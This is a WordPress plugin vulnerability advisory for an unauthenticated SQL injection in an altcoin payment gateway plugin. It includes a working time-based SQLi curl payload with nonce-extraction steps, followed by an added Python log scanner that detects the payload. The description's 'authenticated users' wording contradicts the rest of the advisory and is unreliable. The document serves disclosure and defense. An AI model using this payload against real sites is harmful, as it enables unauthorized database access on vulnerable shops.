WordPress Plugin Vulnerabilities

Bitcoin / AltCoin Payment Gateway < 1.7.3 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users.

Proof of Concept

Setup:

1. Install WooCommerce (dependency; no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:

Payment Confirmation Type: Manual
Enter Coin Name: Bitcoin
Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
Active / Deactivate: checked

Attack:

1. As an unauthenticated user, visit the main page of the WordPress instance and search the page source for "cs_token" to extract the nonce
2. Invoke the following curl command, with the nonce just obtained, to induce a 5 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \
    --data 'method=admin\options\functions\Coin_List@prepare_items'
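A defender-side check for the request shape shown above, added here as an example that is not part of the advisory or of the plugin's code: it parses constructed access-log lines (the hosts, token and timestamps are made up) and flags calls to the admin-ajax action named above whose order parameter is anything other than a sort direction. Because the injected value travels in the query string rather than the POST body, it is visible in ordinary web-server access logs.

```python
"""Flag admin-ajax requests whose 'order' parameter is not a plain sort direction."""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"          # endpoint used in the PoC
SUSPECT_ACTION = "_cs_wapg_custom_call"         # AJAX action used in the PoC
ALLOWED_ORDER = {"asc", "desc"}                 # only legitimate values for a sort direction
# Tokens that never belong in a sort direction (time-based payloads use SLEEP/BENCHMARK).
SQL_TOKENS = re.compile(r"\b(sleep|benchmark|case|when|union|select)\b|[()';]", re.I)


def inspect_request(method: str, url: str) -> Optional[dict]:
    """Return a finding for a suspicious request, or None if it looks benign."""
    parts = urlsplit(url)                       # works for full URLs and bare paths
    if not parts.path.endswith(AJAX_PATH):
        return None
    qs = parse_qs(parts.query)                  # percent-decodes values for us
    if qs.get("action", [""])[0] != SUSPECT_ACTION:
        return None
    order = qs.get("order", [""])[0]
    if order == "" or order.lower() in ALLOWED_ORDER:
        return None
    return {"method": method, "action": SUSPECT_ACTION, "order": order,
            "sql_tokens": bool(SQL_TOKENS.search(order))}


# Constructed sample log lines (not real traffic) in a common-log-like layout.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2023:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=abc123&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END) HTTP/1.1" 200 512
203.0.113.5 - - [17/Apr/2023:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=abc123&order=asc HTTP/1.1" 200 512
198.51.100.7 - - [17/Apr/2023:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')


def scan_log(text: str) -> List[dict]:
    """Run inspect_request over every request line; return the list of findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            finding = inspect_request(m.group("method"), m.group("url"))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```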

Classification

Type
SQLI

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Verified
Yes

Timeline

Publicly Published
2023-04-17
Added
2023-04-17
Last Updated
2024-03-21